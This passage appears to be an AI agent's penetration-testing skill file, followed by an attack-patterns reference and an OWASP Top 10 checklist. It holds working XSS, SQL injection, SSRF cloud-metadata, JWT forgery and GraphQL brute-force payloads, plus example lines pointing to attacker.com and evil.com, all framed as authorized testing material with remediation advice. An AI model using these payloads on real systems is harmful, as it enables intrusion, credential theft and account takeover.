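Findings are ordered by severity before they go into the report table. A sketch of that ordering over the format above (the severity ladder is an assumption mirroring common CVSS bands):

```python
# Order findings for the report: severity rank first, CVSS score as tiebreaker.
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}

def sort_findings(findings):
    return sorted(findings,
                  key=lambda f: (SEVERITY_RANK[f["severity"]], -f.get("cvss_score", 0)))

findings = [
    {"title": "Verbose errors", "severity": "low", "cvss_score": 3.1},
    {"title": "SQL Injection in Login Endpoint", "severity": "critical", "cvss_score": 9.8},
    {"title": "Missing HSTS", "severity": "medium", "cvss_score": 5.3},
]
print([f["severity"] for f in sort_findings(findings)])  # → ['critical', 'medium', 'low']
```
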
### Report Structure

1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists

---

## Responsible Disclosure Workflow

Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.

### Timeline

| Day | Action |
|-----|--------|
| 0 | Discovery — document the finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |

### Key Principles

1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend the deadline if they're actively working on a fix

---

## Workflows

### Workflow 1: Quick Security Check (15 Minutes)

For pre-merge reviews or quick health checks:

```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick

# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high

# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in the Secret Scanning section)

# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```

**Decision**: If there are any critical or high findings, block the merge.

### Workflow 2: Full Penetration Test (Multi-Day Assessment)

**Day 1 — Reconnaissance:**

1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run automated OWASP checklist (full scope)
3. Run dependency audit across all manifests
4. Run secret scan on full git history

**Day 2 — Manual Testing:**

1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)

**Day 3 — Infrastructure and Reporting:**

1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate pen test report

```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```

### Workflow 3: CI/CD Security Gate

Automated security checks that run on every pull request:

```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      # Secret scanning
      - name: Scan for secrets
        uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified

      # Dependency audit
      - name: Audit dependencies
        run: |
          npm audit --audit-level=high
          pip-audit --desc

      # SAST
      - name: Static analysis
        uses: returntocorp/semgrep-action@v1
        with:
          config: >-
            p/security-audit
            p/secrets
            p/owasp-top-ten

      # Security headers check (staging only)
      - name: Check security headers
        if: github.base_ref == 'staging'
        run: |
          curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```

**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.

---

## Anti-Patterns

1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt and restrict access
8. **One-time testing** — Security testing must be continuous; integrate into CI/CD and schedule periodic assessments

---

## Cross-References

| Skill | Relationship |
|-------|--------------|
| [senior-secops](../senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](../senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](../../engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](../code-reviewer/SKILL.md) | Code review practices — includes security review checklist |
@@ -0,0 +1,549 @@
# Attack Patterns Reference

Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only.

---

## XSS Test Payloads

### Reflected XSS

These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers.

**Basic payloads:**

```
<script>alert(document.domain)</script>
"><script>alert(document.domain)</script>
'><script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<body onload=alert(document.domain)>
<input onfocus=alert(document.domain) autofocus>
<marquee onstart=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
```

**Filter bypass payloads:**

```
<ScRiPt>alert(document.domain)</ScRiPt>
<scr<script>ipt>alert(document.domain)</scr</script>ipt>
<script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>
<img src=x onerror="alert(1)">
<svg/onload=alert(document.domain)>
javascript:alert(document.domain)//
```

**URL encoding payloads:**

```
%3Cscript%3Ealert(document.domain)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```

**Context-specific payloads:**

Inside HTML attribute:
```
" onmouseover="alert(document.domain)
' onfocus='alert(document.domain)' autofocus='
```

Inside JavaScript string:
```
';alert(document.domain);//
\';alert(document.domain);//
</script><script>alert(document.domain)</script>
```

Inside CSS:
```
expression(alert(document.domain))
url(javascript:alert(document.domain))
```

### Stored XSS

Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages.

```
<img src=x onerror=alert(document.domain)>
<a href="javascript:alert(document.domain)">click me</a>
<svg><animate onbegin=alert(document.domain) attributeName=x dur=1s>
```

### DOM-Based XSS

Look for JavaScript that reads from these sources and writes to dangerous sinks:

**Sources** (attacker-controlled input):

```
document.location
document.location.hash
document.location.search
document.referrer
window.name
document.cookie
localStorage / sessionStorage
postMessage data
```

**Sinks** (dangerous output):

```
element.innerHTML
element.outerHTML
document.write()
document.writeln()
eval()
setTimeout(string)
setInterval(string)
new Function(string)
element.setAttribute("onclick", ...)
location.href = ...
location.assign(...)
```

**Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization.

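A crude first pass over a codebase is a regex sweep that flags lines where one of the sources and one of the sinks co-occur. This is a sketch only — sources and sinks rarely share a line, so real detection needs data-flow analysis (e.g. the CodeQL approach above):

```python
import re

# Flag JS lines where a DOM XSS source and a sink appear together.
SOURCES = r"(location\.hash|location\.search|document\.referrer|window\.name)"
SINKS = r"(innerHTML|outerHTML|document\.write|eval\()"

def flag_lines(js_text):
    hits = []
    for n, line in enumerate(js_text.splitlines(), 1):
        if re.search(SOURCES, line) and re.search(SINKS, line):
            hits.append(n)
    return hits

sample = 'el.innerHTML = decodeURIComponent(location.hash.slice(1));'
print(flag_lines(sample))  # → [1]
```
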
---

## SQL Injection Detection Patterns

### Detection Payloads

**Error-based detection:**

```
'               -- Single quote triggers SQL error
"               -- Double quote
\               -- Backslash
' OR '1'='1     -- Boolean true
' OR '1'='2     -- Boolean false (compare responses)
' AND 1=1--     -- Boolean true with comment
' AND 1=2--     -- Boolean false (compare responses)
1 OR 1=1        -- Numeric injection
1 AND 1=2       -- Numeric false
```

**Union-based enumeration** (authorized testing only):

```sql
-- Step 1: Find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--               -- Increment until error
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--   -- Match column count

-- Step 2: Find displayable columns
' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--

-- Step 3: Extract database info
' UNION SELECT version(),NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
```

**Time-based blind injection:**

```sql
-- MySQL
' AND SLEEP(5)--
' AND IF(1=1, SLEEP(5), 0)--
' AND IF(SUBSTRING(version(),1,1)='5', SLEEP(5), 0)--

-- PostgreSQL
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--
```

**Boolean-based blind injection:**

```sql
-- Extract data one character at a time
' AND SUBSTRING(username,1,1)='a'--
' AND ASCII(SUBSTRING(username,1,1))>96--
' AND ASCII(SUBSTRING(username,1,1))>109--   -- Binary search
```

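The `ASCII(...) > n` comparison drives a binary search over the printable range, recovering each character in about seven requests instead of ~95 linear guesses. A sketch of the extraction loop, where `oracle()` stands in for one boolean-blind request (an assumption):

```python
# Recover one character via boolean-blind binary search: each oracle(t) call
# answers "is ASCII(char) > t?", e.g. ' AND ASCII(SUBSTRING(username,1,1))>t--
def extract_char(oracle):
    lo, hi = 32, 126          # printable ASCII range
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(mid):       # true → the character is above mid
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)

secret = ord("a")
print(extract_char(lambda t: secret > t))  # → a
```
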
### Database-Specific Syntax

| Feature | MySQL | PostgreSQL | MSSQL | SQLite |
|---------|-------|------------|-------|--------|
| String concat | `CONCAT('a','b')` | `'a' \|\| 'b'` | `'a' + 'b'` | `'a' \|\| 'b'` |
| Comment | `-- ` or `#` | `--` | `--` | `--` |
| Version | `VERSION()` | `version()` | `@@version` | `sqlite_version()` |
| Current user | `CURRENT_USER()` | `current_user` | `SYSTEM_USER` | N/A |
| Sleep | `SLEEP(5)` | `pg_sleep(5)` | `WAITFOR DELAY '0:0:5'` | N/A |

---

## SSRF Detection Techniques

### Basic Payloads

```
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]        -- IPv6 localhost
http://[0000::1]    -- IPv6 localhost (expanded)
```

### Cloud Metadata Endpoints

```
# AWS EC2 Metadata (IMDSv1)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data

# AWS EC2 Metadata (IMDSv2 — requires token header)
# Step 1: curl -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" -X PUT http://169.254.169.254/latest/api/token
# Step 2: curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/

# GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
http://169.254.169.254/computeMetadata/v1/

# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token

# DigitalOcean Metadata
http://169.254.169.254/metadata/v1/
```

### Bypass Techniques

**IP encoding tricks:**

```
http://0x7f000001         -- Hex encoding of 127.0.0.1
http://2130706433         -- Decimal encoding of 127.0.0.1
http://0177.0.0.1         -- Octal encoding
http://127.1              -- Shortened
http://127.0.0.1.nip.io   -- Wildcard DNS resolving to 127.0.0.1 (nip.io)
```

**URL parsing inconsistencies:**

```
http://127.0.0.1@evil.com      -- URL authority confusion
http://evil.com#@127.0.0.1     -- Fragment confusion
http://127.0.0.1%00@evil.com   -- Null byte injection
http://evil.com\@127.0.0.1     -- Backslash confusion
```

**Redirect chains:**

```
# If the app follows redirects, find an open redirect first:
https://target.com/redirect?url=http://169.254.169.254/
```

---

## JWT Manipulation Patterns

### Decode Without Verification

JWTs are Base64URL-encoded and can be decoded without the secret:

```bash
# Decode header
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d
# Output: {"alg":"HS256"}

# Decode payload
echo "eyJ1c2VyIjoiYWRtaW4ifQ" | base64 -d
# Output: {"user":"admin"}
```

### Algorithm Confusion Attacks

**None algorithm attack:**

```json
// Original header
{"alg": "HS256", "typ": "JWT"}

// Modified header — set algorithm to none
{"alg": "none", "typ": "JWT"}

// Token format: header.payload. (empty signature)
```

**RS256 to HS256 confusion:**

If the server uses RS256 (asymmetric), try:

1. Get the server's RSA public key (from JWKS endpoint or TLS certificate)
2. Change `alg` to `HS256`
3. Sign the token using the RSA public key as the HMAC secret
4. If the server naively uses the configured key for both algorithms, it will verify the HMAC with the public key

### Claim Manipulation

```json
// Common claims to modify:
{
  "sub": "1234567890",       // Change to another user's ID
  "role": "admin",           // Escalate from "user" to "admin"
  "is_admin": true,          // Toggle admin flag
  "exp": 9999999999,         // Extend expiration far into the future
  "aud": "admin-api",        // Change audience
  "iss": "trusted-issuer"    // Spoof issuer
}
```

### Weak Secret Brute Force

Common JWT secrets to try (if you have a valid token to test against):

```
secret
password
123456
your-256-bit-secret
jwt_secret
changeme
mysecretkey
HS256-secret
```

Use tools like `jwt-cracker` or `hashcat -m 16500` for dictionary attacks.

### JWKS Injection

If the server fetches keys from a JWKS URL in the JWT header:

```json
{
  "alg": "RS256",
  "jku": "https://attacker.com/.well-known/jwks.json"
}
```

Host your own JWKS with a key pair you control.

---

## API Authorization Testing (IDOR, BOLA)

### IDOR Testing Methodology

**Step 1: Identify resource identifiers**

Map all API endpoints and find parameters that reference resources:

```
GET /api/users/{id}/profile
GET /api/orders/{orderId}
GET /api/documents/{docId}/download
PUT /api/users/{id}/settings
DELETE /api/comments/{commentId}
```

**Step 2: Create two test accounts**

- User A (attacker) and User B (victim)
- Authenticate as both and capture their tokens

**Step 3: Cross-account access testing**

Using User A's token, request User B's resources:

```
# Read
GET /api/users/{B_id}/profile → Should be 403
GET /api/orders/{B_orderId} → Should be 403

# Write
PUT /api/users/{B_id}/settings → Should be 403
PATCH /api/orders/{B_orderId} → Should be 403

# Delete
DELETE /api/comments/{B_commentId} → Should be 403
```

**Step 4: ID manipulation**

```
# Sequential IDs — increment/decrement
/api/users/100 → /api/users/101

# UUID prediction — not practical, but test for leaked UUIDs
# Check if UUIDs appear in other responses

# Encoded IDs — decode and modify
/api/users/MTAw → base64 decode = "100" → encode "101" = MTAx

# Hash-based IDs — check for predictable hashing
/api/users/md5(email) → compute md5 of known emails
```

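The encoded-ID step is mechanical — decode the opaque-looking identifier, step it, re-encode:

```python
import base64

# Decode an opaque-looking ID, increment it, and re-encode
# (the "Encoded IDs" entry above).
encoded = "MTAw"                                   # as seen in the URL
current = int(base64.b64decode(encoded).decode())  # → 100
neighbor = base64.b64encode(str(current + 1).encode()).decode()
print(neighbor)  # → MTAx
```
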
### BFLA (Broken Function Level Authorization)

Test access to administrative functions:

```
# As regular user, try admin endpoints:
POST /api/admin/users → 403
DELETE /api/admin/users/123 → 403
PUT /api/admin/settings → 403
GET /api/admin/reports → 403
POST /api/admin/impersonate/user123 → 403

# Try HTTP method override:
GET /api/admin/users with X-HTTP-Method-Override: DELETE
POST /api/admin/users with _method=DELETE
```

### Mass Assignment Testing

```json
// Normal user update request:
PUT /api/users/profile
{
  "name": "Normal User",
  "email": "user@test.com"
}

// Mass assignment attempt — add privileged fields:
PUT /api/users/profile
{
  "name": "Normal User",
  "email": "user@test.com",
  "role": "admin",
  "is_verified": true,
  "is_admin": true,
  "balance": 99999,
  "subscription": "enterprise",
  "permissions": ["admin", "superadmin"]
}

// Then check if any extra fields were persisted:
GET /api/users/profile
```
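To judge the result, diff the profile returned by the final GET against the pre-attempt profile. A minimal sketch; the privileged field names are illustrative:

```python
# Fields a regular user should never be able to set on themselves
PRIVILEGED_FIELDS = {"role", "is_admin", "is_verified", "balance",
                     "subscription", "permissions"}

def persisted_privileged_fields(before, after):
    """Return privileged fields whose value changed after the attempt."""
    return {
        field for field in PRIVILEGED_FIELDS
        if after.get(field) != before.get(field)
    }
```

A non-empty result is a confirmed mass assignment finding.
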

---
## GraphQL Security Testing Patterns

### Introspection Query

Use this to map the entire schema (should be disabled in production):

```graphql
{
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      kind
      fields {
        name
        type {
          name
          kind
          ofType { name kind }
        }
        args { name type { name } }
      }
    }
  }
}
```
### Query Depth Attack

Nested queries can cause exponential resource consumption:

```graphql
{
  users {
    friends {
      friends {
        friends {
          friends {
            friends {
              friends {
                name
              }
            }
          }
        }
      }
    }
  }
}
```

**Mitigation check:** Server should return an error like "Query depth exceeds maximum allowed depth."
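Depth probes like the one above are easier to tune when generated. A small sketch (the field names are illustrative):

```python
def depth_attack_query(field="friends", depth=10, leaf="name"):
    """Build a deeply nested GraphQL query to probe depth limits."""
    body = leaf
    for _ in range(depth):
        body = f"{field} {{ {body} }}"
    return f"{{ users {{ {body} }} }}"
```

Increase `depth` until the server either rejects the query or its response time degrades; the rejection threshold is the configured depth limit.
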
### Query Complexity Attack

Wide queries with aliases:

```graphql
{
  a: users(limit: 1000) { name email }
  b: users(limit: 1000) { name email }
  c: users(limit: 1000) { name email }
  d: users(limit: 1000) { name email }
  e: users(limit: 1000) { name email }
}
```
### Batch Query Attack

Send multiple operations in a single request to bypass rate limiting:

```json
[
  {"query": "mutation { login(user:\"admin\", pass:\"pass1\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"pass2\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"pass3\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"pass4\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"pass5\") { token } }"}
]
```
### Field Suggestion Exploitation

GraphQL often suggests similar field names on typos:

```graphql
{ users { passwor } }
# Response: "Did you mean 'password'?"
```

Use this to discover hidden fields without full introspection.
### Authorization Bypass via Fragments

```graphql
query {
  publicUser(id: 1) {
    name
    ...on User {
      email      # Should be restricted
      ssn        # Should be restricted
      creditCard # Should be restricted
    }
  }
}
```

---
## Rate Limiting Bypass Techniques

These techniques help verify that rate limiting is robust during authorized testing:

```
# IP rotation — test if rate limiting is per-IP only
X-Forwarded-For: 1.2.3.4
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4

# Case variation — test if endpoints are case-sensitive
/api/login
/API/LOGIN
/Api/Login

# Path variation
/api/login
/api/login/
/api/./login
/api/login?dummy=1

# HTTP method variation
POST /api/login
PUT /api/login

# Percent-encoding
/api/logi%6E
```

If any of these bypass rate limiting, the implementation needs hardening.
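A sketch of a prober for the header-spoofing variants above. The endpoint is a placeholder for your authorized target, and `post` is injectable so the logic can be tested offline:

```python
LOGIN_URL = "https://target.example.com/api/login"  # placeholder

SPOOF_VARIANTS = [
    {},  # baseline: the limiter should fire here first
    {"X-Forwarded-For": "1.2.3.4"},
    {"X-Real-IP": "1.2.3.4"},
    {"X-Originating-IP": "1.2.3.4"},
]

def attempts_until_limited(headers, attempts=20, post=None):
    """Return the attempt number that first received HTTP 429, or None.

    None for a spoofed variant means the limiter keys on a
    client-supplied header and needs hardening.
    """
    if post is None:
        import requests  # only needed for live testing
        post = lambda h: requests.post(
            LOGIN_URL, json={"user": "a", "pass": "wrong"},
            headers=h, timeout=10).status_code
    for attempt in range(1, attempts + 1):
        if post(headers) == 429:
            return attempt
    return None
```

Run it once per entry in `SPOOF_VARIANTS` and compare the thresholds against the baseline.
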
# OWASP Top 10 (2021) — Detailed Security Checklist

Comprehensive reference for each OWASP Top 10 category with descriptions, test procedures, code patterns to detect, remediation steps, and CVSS scoring guidance.

---

## A01:2021 — Broken Access Control

**CWEs Covered:** CWE-200, CWE-201, CWE-352, CWE-639, CWE-862, CWE-863

### Description

Access control enforces policy so users cannot act outside their intended permissions. Failures typically lead to unauthorized disclosure, modification, or destruction of data, or performing business functions outside the user's limits.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Horizontal privilege escalation | Change user ID in API requests (`/users/123` to `/users/124`) | 403 Forbidden |
| 2 | Vertical privilege escalation | Access admin endpoints with regular user token | 403 Forbidden |
| 3 | CORS validation | Send request with `Origin: https://evil.com` | `Access-Control-Allow-Origin` must not reflect arbitrary origins |
| 4 | Forced browsing | Request `/admin`, `/debug`, `/api/internal`, `/.env`, `/swagger.json` | 403 or 404 |
| 5 | Method-based bypass | Try POST instead of GET, or PUT instead of PATCH | Authorization checks apply regardless of HTTP method |
| 6 | JWT claim manipulation | Modify `role`, `is_admin`, `user_id` claims, re-sign with weak secret | 401 Unauthorized |
| 7 | Path traversal in authorization | Request `/api/users/../admin/settings` | Canonical path check must reject traversal |
| 8 | API endpoint enumeration | Fuzz API paths with wordlists | Only documented endpoints should respond |

### Code Patterns to Detect

```python
# BAD: No authorization check on resource access
@app.route("/api/documents/<doc_id>")
def get_document(doc_id):
    return Document.query.get(doc_id).to_json()  # No ownership check!

# GOOD: Verify ownership
@app.route("/api/documents/<doc_id>")
@login_required
def get_document(doc_id):
    doc = Document.query.get_or_404(doc_id)
    if doc.owner_id != current_user.id:
        abort(403)
    return doc.to_json()
```

```javascript
// BAD: Client-side only access control
{isAdmin && <AdminPanel />} // Hidden but still accessible via API

// GOOD: Server-side middleware
app.use('/admin/*', requireRole('admin'));
```
### Remediation

1. Deny by default — require explicit authorization for every endpoint
2. Implement server-side access control, never rely on client-side checks
3. Use UUIDs instead of sequential IDs for resource identifiers
4. Log and alert on access control failures
5. Rate limit API requests to minimize automated enumeration
6. Disable CORS or restrict to specific trusted origins
7. Invalidate server-side sessions on logout

### CVSS Scoring Guidance

- **Horizontal escalation (read):** CVSS 6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **Horizontal escalation (write):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
- **Vertical escalation to admin:** CVSS 8.8 — AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **Unauthenticated admin access:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

---
## A02:2021 — Cryptographic Failures

**CWEs Covered:** CWE-259, CWE-327, CWE-328, CWE-330, CWE-331

### Description

Failures related to cryptography that often lead to sensitive data exposure. This includes using weak algorithms, improper key management, and transmitting data in cleartext.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | TLS version | `nmap --script ssl-enum-ciphers -p 443 target` | Only TLS 1.2+ accepted |
| 2 | Certificate validity | `openssl s_client -connect target:443` | Valid cert, not self-signed |
| 3 | HSTS header | Check response headers | `Strict-Transport-Security: max-age=31536000` |
| 4 | Password storage | Review auth code | bcrypt/scrypt/argon2 with cost >= 10 |
| 5 | Sensitive data in URLs | Review access logs | No tokens, passwords, or PII in query params |
| 6 | Encryption at rest | Check database/storage config | Sensitive fields encrypted (AES-256-GCM) |
| 7 | Key management | Review key storage | Keys in secrets manager, not in code/env files |
| 8 | Random number generation | Review token generation code | Uses crypto-grade PRNG (secrets module, crypto.randomBytes) |

### Code Patterns to Detect

```python
# BAD: MD5 for password hashing
password_hash = hashlib.md5(password.encode()).hexdigest()

# BAD: Hardcoded encryption key
cipher = AES.new(b"mysecretkey12345", AES.MODE_GCM)

# BAD: Weak random for tokens
token = str(random.randint(100000, 999999))

# GOOD: bcrypt for passwords
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))

# GOOD: Secrets module for tokens
token = secrets.token_urlsafe(32)
```

### Remediation

1. Use TLS 1.2+ for all data in transit; redirect HTTP to HTTPS
2. Use bcrypt (cost 12+), scrypt, or argon2id for password hashing
3. Use AES-256-GCM for encryption at rest
4. Store keys in a secrets manager (Vault, AWS Secrets Manager, GCP Secret Manager)
5. Use `secrets` (Python) or `crypto.randomBytes` (Node.js) for token generation
6. Enable HSTS with preload
7. Never store sensitive data in URLs or logs

### CVSS Scoring Guidance

- **Cleartext transmission of passwords:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Weak password hashing (MD5):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Hardcoded encryption key:** CVSS 7.2 — AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

---
## A03:2021 — Injection

**CWEs Covered:** CWE-20, CWE-74, CWE-75, CWE-77, CWE-78, CWE-79, CWE-89

### Description

Injection flaws occur when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command, LDAP, XPath, and template injection.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | SQL injection | Submit `' OR 1=1--` in input fields | No data leakage, proper error handling |
| 2 | Blind SQL injection | Submit `' AND SLEEP(5)--` | No 5-second delay in response |
| 3 | NoSQL injection | Submit `{"$gt":""}` in JSON fields | No data leakage |
| 4 | XSS (reflected) | Submit `<script>alert(1)</script>` | Input is escaped/encoded in response |
| 5 | XSS (stored) | Submit payload in persistent fields | Payload is sanitized before storage |
| 6 | Command injection | Submit `; whoami` in fields | No command execution |
| 7 | Template injection | Submit `{{7*7}}` | No "49" in response |
| 8 | LDAP injection | Submit `*)(uid=*))(|(uid=*` | No directory enumeration |

### Code Patterns to Detect

```python
# BAD: String concatenation in SQL
cursor.execute("SELECT * FROM users WHERE email = '" + email + "'")
cursor.execute(f"SELECT * FROM users WHERE email = '{email}'")

# GOOD: Parameterized query
cursor.execute("SELECT * FROM users WHERE email = %s", (email,))
```

```javascript
// BAD: Template literal in SQL
db.query(`SELECT * FROM users WHERE id = ${userId}`);

// GOOD: Parameterized query
db.query('SELECT * FROM users WHERE id = $1', [userId]);
```

### Remediation

1. Use parameterized queries / prepared statements for ALL database operations
2. Use ORM methods with bound parameters (not raw queries)
3. Validate and sanitize all input on the server side
4. Use Content-Security-Policy to mitigate XSS impact
5. Escape output based on context (HTML, JS, URL, CSS)
6. Never pass user input to eval(), exec(), os.system(), or child_process
7. Use allowlists for expected input formats

### CVSS Scoring Guidance

- **SQL injection (unauthenticated):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Stored XSS:** CVSS 7.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- **Reflected XSS:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Command injection:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

---
## A04:2021 — Insecure Design

**CWEs Covered:** CWE-209, CWE-256, CWE-501, CWE-522

### Description

Insecure design represents weaknesses in the design and architecture of the application, distinct from implementation bugs. This includes missing or ineffective security controls.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Rate limiting | Send 100 rapid requests to login | 429 after threshold (5-10 attempts) |
| 2 | Business logic abuse | Submit negative quantities, skip payment | All calculations server-side |
| 3 | Account lockout | 10+ failed login attempts | Account locked or CAPTCHA triggered |
| 4 | Multi-step flow bypass | Skip steps via direct URL access | Server validates state at each step |
| 5 | Password reset abuse | Request multiple reset tokens | Previous tokens invalidated |

### Remediation

1. Use threat modeling during design phase (STRIDE, PASTA)
2. Implement rate limiting on all sensitive endpoints
3. Validate business logic on the server, never trust client calculations
4. Use state machines for multi-step workflows
5. Implement CAPTCHA for public-facing forms after threshold
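Remediation item 4 can be as small as a transition table checked on every request. A minimal sketch with illustrative checkout step names:

```python
# Server-side state machine for a multi-step checkout flow (step names are
# illustrative). Each transition is validated against the user's stored
# state, so jumping straight to "confirm" via a direct URL is rejected.
CHECKOUT_FLOW = {
    None: {"cart"},
    "cart": {"shipping"},
    "shipping": {"payment"},
    "payment": {"confirm"},
}

def advance(current_step, requested_step):
    """Return the new step, or raise if the client tries to skip ahead."""
    if requested_step not in CHECKOUT_FLOW.get(current_step, set()):
        raise PermissionError(
            f"illegal transition {current_step!r} -> {requested_step!r}"
        )
    return requested_step
```
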
### CVSS Scoring Guidance

- **Missing rate limit on auth:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Business logic bypass (financial):** CVSS 8.1 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

---
## A05:2021 — Security Misconfiguration

**CWEs Covered:** CWE-2, CWE-11, CWE-13, CWE-15, CWE-16, CWE-388

### Description

The application is improperly configured, with default settings, unnecessary features enabled, verbose error messages, or missing security hardening.

### Test Procedures

| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Default credentials | Try admin:admin, root:root | Rejected |
| 2 | Debug mode | Trigger application errors | No stack traces in response |
| 3 | Security headers | Check response headers | CSP, X-Frame-Options, X-Content-Type-Options, HSTS present |
| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed |
| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) |
| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed |
| 7 | Error messages | Submit invalid data | Generic error messages, no internal details |

### Remediation

1. Disable debug mode in production
2. Remove default credentials and accounts
3. Add all security headers (CSP, HSTS, X-Frame-Options, X-Content-Type-Options, Referrer-Policy)
4. Remove Server and X-Powered-By headers
5. Disable directory listing
6. Implement generic error pages
